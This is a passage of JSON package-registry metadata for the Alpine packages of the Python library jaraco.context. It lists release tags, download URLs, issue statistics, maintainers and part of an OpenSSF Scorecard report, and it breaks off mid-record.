USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.600Z","dependent_packages_count":1,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":12.100548201631234,"stargazers_count":17.91014841556358,"forks_count":17.60262067121273,"average":11.903329322101886},"purl":"pkg:apk/alpine/py3-jaraco-context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.14","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-jaraco-context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":1819,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-02-19T23:53:21.488Z","updated_at":"2023-02-19T23:53:21.488Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.14","url":"https://pkgs.alpinelinux.org/packages?branch=v3.14","ecosystem":"alpine","default":false,"packages_count":14958,"maintainers_count":258,"namespaces_count":2,"keywords_count":2179,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":682},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.706Z","updated_at":"2026-08-18T05:04:15.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/namespaces"}},{"id":13009107,"name":"py3-jaraco.context-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-jaraco.context","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_number":"6.0.1-r1","last_synced_at":"2026-04-13T20:04:43.661Z","created_at":"2026-01-31T00:52:15.556Z","updated_at":"2026-08-06T19:26:18.639Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.23/community/x86_64/py3-jaraco.context-pyc","install_command":"apk add py3-jaraco.context-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively 